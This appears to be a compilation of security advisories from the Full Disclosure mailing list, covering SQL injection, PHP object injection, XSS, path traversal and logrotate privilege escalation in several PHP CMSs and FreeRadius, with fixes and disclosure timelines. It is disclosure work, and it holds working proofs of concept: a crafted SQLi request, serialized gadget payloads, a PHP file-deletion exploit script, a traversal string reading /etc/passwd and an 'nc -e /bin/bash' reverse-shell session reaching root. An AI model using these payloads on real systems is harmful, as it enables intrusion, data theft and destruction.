[FD] [AIT-SA-20220208-01] SexyPolling SQL Injection
SexyPolling SQL Injection | Identifier: | AIT-SA-20220208-01| | Target: | Sexy Polling ( Joomla Extension) | | Vendor: | 2glux | | Version: | all versions below version 2.1.8 | | CVE: | Not yet | | Accessibility: | Remote | | Severity: | Critical | | Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) | Summary [Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php. Vulnerability Description In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections. In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked: ``` $min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : ''; $max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : ''; ``` These are later used unfiltered by the WHERE clause: ``` $query_toal = "SELECT COUNT(sv.`id_answer`) total_count, MAX(sv.`date`) max_date, MIN(sv.`date`) min_date FROM `#__sexy_votes` sv JOIN `#__sexy_answers` sa ON sa.id_poll = '$polling_id' AND sa.published = '1' WHERE sv.`id_answer` = sa.id"; //if dates are sent, add them to query if ($min_date_sended != '' && $max_date_sended != '') $query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' "; ``` Proof Of Concept == To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe. HTTP-Request: ``` POST /components/com_sexypolling/vote.php HTTP/1.1 Host: joomla-server.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest HTTP_X_REAL_IP: 1.1.1.1 Content-Length: 193 Origin: joomla-server.local Connection: close Referer: joomla-server.local/index.php/component/search/ Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6 polling_id=1_id[]=3=digits_date=2021-12-07'_date=2021-12-14_name=-_code=-_name=-_name=-_period=24=1 ``` The HTTP-Resoonse contains a mysql error: ``` HTTP/1.1 500 Internal Server Error Date: Wed, 15 Dec 2021 10:27:40 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/ Content-Length: 4768 Connection: close Content-Type: application/json Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 00:00:00 AND sv.`date` = 2021-12-14 23:59:59 at line 12 https://fonts.googleapis.com/css?family=Open+Sans; rel="stylesheet" /> ``` Vulnerable Versions All versions below version 2.1.8 Tested Versions = Sexy Polling ( Joomla Extension) 2.1.7 Impact == An unauthenticated attacker could inject and execute SQL commands on the database. Mitigation = Sexy Polling 2.1.8 fixed that issue Vendor Contact Timeline | 2021-12-14 | Unable to find a contact of the vendor | | 2021-12-15 | Contacting Joomla Security Strike Team | | 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. | | 2022-01-01 | Sexy Polling releases 2.1.8 | | 2022-04-08 | Public Disclosure | *We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.* Advisory URL === [https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] [AIT-SA-20210215-04] CVE-2020-24036: ForkCMS PHP Object Injection
ForkCMS PHP Object Injection
=
| Identifier: | AIT-SA-20210215-04 |
| Target: | ForkCMS |
| Vendor: | ForkCMS |
| Version: | all versions below version 5.8.3 |
| CVE: | CVE-2020-24036 |
| Accessibility: | Remote |
| Severity: | Medium |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |
SUMMARY
=
[ForkCMS is an open source cms written in PHP.](https://www.fork-cms.com/)
VULNERABILITY DESCRIPTION
PHP object injection in the Ajax-endpoint of the backend in ForkCMS below
version 5.8.3 allows authenticated remote user to execute malicious code.
The ajax-callbacks for the backend use unserialize without restrictions or any
validations. An authenticated user could abuse this to inject malicious
PHP-Objects which could lead to remote code execution:
```
getRequest()->request->get('url', '');
$className = $this->getRequest()->request->get('className', '');
$methodName = $this->getRequest()->request->get('methodName', '');
$parameters = $this->getRequest()->request->get('parameters', '');
// cleanup values
$parameters = unserialize($parameters); // ← VULNERABLE CODE
// fetch generated meta url
$url = urldecode($this->get('fork.repository.meta')->generateUrl($url,
$className, $methodName, $parameters));
// output
$this->output(Response::HTTP_OK, $url);
}
}
```
PROOF OF CONCEPT
=
In order to exploit this vulnerability, an attacker has to be authenticated
with least privileges. We tested this exploit with “Dashboard” permissions.
For demonstration purposes we created a proof of concept exploit that deletes
files and directories from the webserver. With more effort an attacker might
also find a payload for executing a webshell. There are many gadgets available
in the vendor directory for potential payloads.
The object-injection code for generating a payload might look as following:
```
'O:27:"Swift_KeyCache_DiskKeyCache":1:{s:4:"keys";a:1:{s:%d:"%s";a:1:{s:%d:"%s";s:9:"something";}}}'
% (len(filepath),filepath,len(deletefile),deletefile)
```
VULNERABLE VERSIONS
===
All versions including 5.8.1 are affected.
TESTED VERSIONS
===
ForkCMS 5.8.1 (with Debian 10 and PHP 7.3.14-1)
IMPACT
==
An authenticated user with minimal privileges could execute malicious code.
MITIGATION
==
Fork-5.8.3 fixed that issue
VENDOR CONTACT TIMELINE
| 2020-05-01 | Contacting the vendor |
| 2020-06-08 | Vendor replied |
| 2020-07-07 | Vendor released an updated version |
| 2021-02-15 | Public disclosure |
ADVISORY URL
[https://www.ait.ac.at/ait-sa-20210215-04-poi-forkcms](https://www.ait.ac.at/ait-sa-20210215-04-poi-forkcms)
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [AIT-SA-20210215-03] CVE-2020-24912: QCube Cross-Site-Scripting
QCube Cross-Site-Scripting
==
| Identifier: | AIT-SA-20210215-03 |
| Target: | QCubed Framework |
| Vendor: | QCubed |
| Version: | all versions including 3.1.1 |
| CVE: | CVE-2020-24912 |
| Accessibility: | Remote |
| Severity: | High |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |
SUMMARY
===
QCubed is a PHP Model-View-Controller Rappid Application Development framework.
(https://github.com/qcubed/qcubed)
VULNERABILITY DESCRIPTION
=
A reflected cross-site scripting (XSS) vulnerability in qcubed (all versions
including 3.1.1) in profile.php via the stQuery-parameter allows
unauthenticated attackers to steal sessions of authenticated users.
PROOF OF CONCEPT
=
The XSS occurs because the SQL-output in profile.php is not sanitized properly.
Since we are able to tamper the output using a SQL-injection(CVE-2020-24913),
we can easily output a common XSS string.
We use the following payload(unencoded):
```
a:1:{i:0;a:3:{s:12:"objBacktrace";a:1:{s:4:"args";a:1:{i:0;s:3:"PWN";}}s:8:"strQuery";s:112:"select
version(); select
convert_from(decode($$PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K$$,$$base64$$),$$utf-8$$)";s:11:"dblTimeInfo";s:1:"1";}}
```
PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K is unencoded:
```
"alert(‘xss’)"
```
VULNERABLE VERSIONS
===
All versions including 3.1.1 are affected.
TESTED VERSIONS
===
QCubed 3.1.1
IMPACT
==
An unauthenticated attacker could steal sessions of authenticated users.
MITIGATION
==
A patch was delivered by QCubed that allows to disable the
profile-functionality( https://github.com/qcubed/qcubed/pull/1320/files ).
VENDOR CONTACT TIMELINE
===
| 2020-04-19 | Contacting the vendor |
| 2020-04-19 | Vendor replied |
| 2020-05-01 | Vendor released a patch at Github |
| 2021-02-15 | Public disclosure |
ADVISORY URL
[https://www.ait.ac.at/ait-sa-20210215-03-xss-qcubed](https://www.ait.ac.at/ait-sa-20210215-03-xss-qcubed)
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [AIT-SA-20210215-02] CVE-2020-24913: QCubed SQL Injection
QCubed SQL Injection
==
| Identifier: | AIT-SA-20210215-02 |
| Target: | QCubed Framework |
| Vendor: | QCubed |
| Version: | all versions including 3.1.1 |
| CVE: | CVE-2020-24913 |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |
SUMMARY
===
QCubed is a PHP Model-View-Controller Rappid Application Development framework.
(https://github.com/qcubed/qcubed)
VULNERABILITY DESCRIPTION
=
A SQL injection vulnerability in qcubed (all versions including 3.1.1) in
profile.php via the strQuery parameter allows an unauthenticated attacker to
access the database by injecting SQL code via a crafted POST request. The
strQuery parameter of the serialized array in profile.php could lead to a
sql-injection. This parameter is used by the PrintExplainStatement which
simply concats "EXPLAIN ." with this parameter:
public function ExplainStatement($sql) {
return $this->Query("EXPLAIN " . $sql);
}
This query will be executed unfiltered.
We were able to write proof-of concept exploit for mysql and postgres.
Unfortunately with mysql we were not able to use a stacked-queries-payload and
we had to exploit this vulnerability with a timebased approach.
VULNERABLE VERSIONS
===
All versions including 3.1.1 are affected.
TESTED VERSIONS
===
QCubed 3.1.1
IMPACT
==
An unauthenticated attacker could access the database remotely. In worst case
scenarios an attacker might be able to execute code on the remote machine
MITIGATION
==
A patch was delivered by QCubed that allows to disable the
profile-functionality( https://github.com/qcubed/qcubed/pull/1320/files ).
VENDOR CONTACT TIMELINE
===
| 2020-04-19 | Contacting the vendor |
| 2020-04-19 | Vendor replied |
| 2020-05-01 | Vendor released a patch at Github |
| 2021-02-15 | Public disclosure |
ADVISORY URL
[https://www.ait.ac.at/ait-sa-20210215-02-unauthenticated-sql-injection-qcubed](https://www.ait.ac.at/ait-sa-20210215-02-unauthenticated-sql-injection-qcubed)
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [AIT-SA-20210215-01] CVE-2020-24914: QCubed PHP Object Injection
QCubed PHP Object Injection === | Identifier: | AIT-SA-20210215-01 | | Target: | QCubed Framework | | Vendor: | QCubed | | Version: | all versions including 3.1.1 | | CVE: | CVE-2020-24914 | | Accessibility: | Remote | | Severity: | Critical | | Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) | SUMMARY === QCubed is a PHP Model-View-Controller Rappid Application Development framework. (https://github.com/qcubed/qcubed) VULNERABILITY DESCRIPTION = A PHP object injection bug in profile.php in qcubed (all versions including 3.1.1) unserializes the untrusted data of the POST-variable "strProfileData" and allows an unauthenticated attacker to execute code via a crafted POST request. qcubed/assets/php/profile.php: https://www.ait.ac.at/ait-sa-20210215-01-unauthenticated-remote-code-execution-qcubed](https://www.ait.ac.at/ait-sa-20210215-01-unauthenticated-remote-code-execution-qcubed) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [AIT-SA-20200301-01] CVE-2020-9364: Directory Traversal in Creative Contact Form
# Directory Traversal in Creative Contact Form
## Overview
* Identifier: AIT-SA-20200301-01
* Target: Creative Contact Form (for Joomla)
* Vendor: Creative Solutions
* Version: 4.6.2 (before Dec 03 2019)
* CVE: CVE-2020-9364
* Accessibility: Remote
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)
## Summary
[Creative Contact Form](https://creative-solutions.net/) is a responsive jQuery
contact form for the Joomla content-management-system.
## Vulnerability Description
A directory traversal vulnerability resides inside the mailer component of the
Creative Contact Form for Joomla. An attacker could exploit this vulnerability
to receive any files from the server via e-mail.
The vulnerable code is located in "helpers/mailer.php" at line 290:
```
if(isset($_POST['creativecontactform_upload'])) {
if(is_array($_POST['creativecontactform_upload'])) {
foreach($_POST['creativecontactform_upload'] as $file) {
// echo $file.'--';
$file_path = JPATH_BASE .
'/components/com_creativecontactform/views/creativeupload/files/'.$file;
$attach_files[] = $file_path;
}
}
}
```
If an attacker puts "../../../../../../../../etc/passwd" into
$_POST['creativecontactform_upload'], and enables "Send me a copy", the
contact-form would send him the content of /etc/passwd via email.
_Note: this vulnerability might not be exploitable in the free version of
Creative Contact Form since it does not allow "Send copy to sender"._
## Vulnerable Versions
Creative Contact Form Personal/Professional/Business 4.6.2 (before Dec 3 2019)
## Impact
An unauthenticated attacker could receive any file from the server
## Mitigation
Update to the current version
## References:
* https://nvd.nist.gov/vuln/detail/CVE-2020-9364
## Vendor Contact Timeline
* `2019-12-02` Contacting the vendor
* `2019-12-02` Vendor published a fixed version
* `2019-03-01` Public disclosure
## Advisory URL
[https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form](https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form)
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [AIT-SA-20191129-01] CVE-2019-16885: Unauthenticated remote code execution in OkayCMS
# Unauthenticated remote code execution in OkayCMS
## Overview
* Identifier: AIT-SA-20191129-01
* Target: OkayCMS
* Vendor: OkayCMS
* Version: all versions including 2.3.4
* CVE: CVE-2019-16885
* Accessibility: Local
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)
## Summary
[OkayCMS is a simple and functional content managment system for an online
store.](https://okay-cms.com)
## Vulnerability Description
An unauthenticated attacker can upload a webshell by injecting a malicious
php-object via a crafted cookie. This could happen at two places. First in
"view/ProductsView.php" using the cookie "price_filter" or in
"api/Comparison.php" via the cookie "comparison". Both cookies will pass
untrusted values to a unserialize()-function. The following code shows the
vulnerability in "api/Comparison.php":
```
$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) :
array();
```
The unsafe deserialization also occurs in "view/ProductsView.php":
```
$price_filter = unserialize($_COOKIE['price_filter']);
```
## Proof of Concept
The following code utilizes an object of the smarty-component to delete
arbitrary files from the webhost:
```
\n";
exit(1);
}
$url = $argv[1];
$file = $argv[2];
class Smarty_Internal_CacheResource_File {
public function releaseLock(Smarty $smarty, Smarty_Template_Cached
$cached) {
$cached->is_locked = false;
@unlink($cached->lock_id);
}
}
class Smarty_Template_Cached {
public $handler = null;
public $is_locked = true;
public $lock_id = "";
public function __construct() {
$this->lock_id = $GLOBALS['file'];
$this->handler = new Smarty_Internal_CacheResource_File;
}
}
class Smarty {
public $cache_locking = true;
}
class Smarty_Internal_Template {
public $smarty = null;
public $cached = null;
public function __construct() {
$this->smarty = new Smarty;
$this->cached = new Smarty_Template_Cached;
}
public function __destruct(){
if ($this->smarty->cache_locking && isset($this->cached) &&
$this->cached->is_locked) {
$this->cached->handler->releaseLock($this->smarty, $this->cached);
}
}
}
$obj = new Smarty_Internal_Template();
$serialized = serialize($obj);
$un = unserialize($serialized);
$headers = [
'Accept-Language: en-US,en;q=0.5',
"Referer: $url/en/catalog/myagkie-igrushki",
'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';'
];
$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_HTTPHEADER => $headers,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_URL => "$url/en/catalog/myagkie-igrushki/sort-price",
CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0'
]);
$resp = curl_exec($curl);
if(curl_error($curl)) {
print curl_error($curl);
}
curl_close($curl);
print $resp;
?>
```
## Notes
Because of the high severity of this vulnerability we will not release a full
exploit for the remote code execution.
## Vulnerable Versions
versions of the “Lite”-branch including 2.3.4. Pro Versions prior 3.0.2 might
have been affected too.
## Tested Versions
OkayCMS-Lite 2.3.4
## Impact
An unauthenticated attacker could upload a webshell to the server and execute
commands remotely.
## Mitigation
At the moment of this publication the vendor has only patched the paid version
of the CMS, so a change to other free software or an upgrade to the Pro version
of OkayCMS is recommended.
## References:
* https://nvd.nist.gov/vuln/detail/CVE-2019-16885
## Vendor Contact Timeline
* `2019-08-29` Contacting the vendor
* `2019-09-04` Vendor replied
* `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix
* `2019-09-29` Public disclosure
## Advisory URL
[https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms)
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [AIT-SA-20191112-01] CVE-2019-10143: Privilege Escalation via Logrotate in FreeRadius
# Privilege Escalation via Logrotate in FreeRadius
## Overview
Identifier: AIT-SA-20191112-01
Target: FreeRadius
Vendor: FreeRadius
Version: all versions including 3.0.19
Fixed in Version: 12.2.3, 12.1.8 and 12.0.8
CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-10143
Accessibility: Local
Severity: Low
Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)
## Summary
[FreeRadius is a modular Open-Source RADIUS suite.](https://freeradius.org/)
## Vulnerability Description
The ownership of the logdirectory "radacct" belongs to user "radiusd". User
"radiusd" can elevate the privileges to "root" because of an unsafe interaction
with logrotate.
User "radiusd" owns the log directory /var/log/radius/radacct:
```
drwx--. 3 radiusd radiusd 4096 26. Apr 16:01 /var/log/radius/radacct/
```
Log files rotate once a day(or any other frequency if configured) by logrotate
as user root. The configuration does not use the "su" directive:
```
/var/log/radius/radacct/*/detail {
monthly
rotate 4
nocreate
missingok
compress
}
```
Since logrotate is prone to a race-condition(see
https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition) it
is possible for user "radiusd" to replace the
directory /var/log/radius/radacct/logdir with a symbolic link to any
directory(for example /etc/bash_completion.d). logrotate will place the
compressed files AS ROOT into /etc/bash_completition.d and set the owner and
group to "radiusd.radiusd". An attacker could simply place a reverse-shell into
this file. As soon as root logs in, a reverse shell will be executed then.
Details of the race-condition in logrotate can be found at:
* https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
*
https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
* https://github.com/whotwagner/logrotten
## Proof of Concept
The following example illustrates how an attacker who already gained a shell as
user "radiusd", can elevate his privileges to "root". After downloading and
compiling, the exploit gets executed and waits until the next daily run of
logrotate. If the rotation of the log file succeeds, a new file that contains
the reverse shell payload, will be written into /etc/bash_completition.d/ with
owner "radiusd". As soon as root logs in, the reverse shell gets executed and
opens a shell on the attackers netcat listener:
```
radiusd@redhat7:~$ git clone https://github.com/whotwagner/logrotten.git
/tmp/logrotten
Cloning into '/tmp/logrotten'...
remote: Enumerating objects: 84, done.
remote: Counting objects: 100% (84/84), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0
Unpacking objects: 100% (84/84), done.
radiusd@redhat7:~$ mkdir -p /var/log/radius/radacct/logdir
radiusd@redhat7:~$ touch /var/log/radius/radacct/logdir/detail
radiusd@redhat7:~$ cd /tmp/logrotten && gcc -o logrotten logrotten.c
radiusd@redhat7:/tmp/logrotten$ ./logrotten -c
/var/log/radius/radacct/logdir/detail
Waiting for rotating /var/log/radius/radacct/logdir/detail...
Renamed /var/log/radius/radacct/logdir/detail with
/var/log/radius/radacct/logdir/detail2 and created symlink to
/etc/bash_completion.d
Done!
radiusd@redhat7:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 20
-rw-r--r-- 1 root root 11144 Oct 28 2018 grub
-rw-r--r-- 1 radiusd radiusd 33 May 12 18:44 detail.1.gz
radiusd@redhat7:/tmp/logrotten$ echo "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e
/bin/bash localhost &); fi" > /etc/bash_completion.d/detail.1.gz
radiusd@redhat7:/tmp/logrotten$ nc -nvlp
listening on [any] ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526
id
uid=0(root) gid=0(root) groups=0(root)
```
## Vulnerable Versions
All versions including 3.0.19
## Tested Versions
Name : freeradius
Architecture: x86_64
Version: 3.0.13
Release: 9.el7_5
## Impact
An attacker who already achieved a valid shell as user "radiusd" could elevate
the privileges to "root". The fact that another exploit is needed to get a
shell lowers the severity from high to low.
## Mitigation
Add "su radiusd:radiusd" to all log sections in /etc/logrotate.d/radiusd.
By keeping SELinux in "Enforcing" mode, the "radiusd" user will be limited in
the directories he can write to.
## References:
* https://access.redhat.com/security/cve/cve-2019-10143
* https://nvd.nist.gov/vuln/detail/CVE-2019-10143
## Vendor Contact Timeline
* `2019-05-01` Contacting RedHat
* `2019-05-07` RedHat opens issue at the vendor bugtracker
* `2019-05-23` CVE gets assigned to the issue
* `2019-05-24` FreeRadius is skeptical about the "security" impact
* `2019-11-12` Public disclosure
## Notes
This CVE is disputed because the vendor [stated that there is no known remote
code execution in freeradius that allows an attacker to gain a shell as user
"radiusd"]( https://freeradius.org/security/). CVE's are
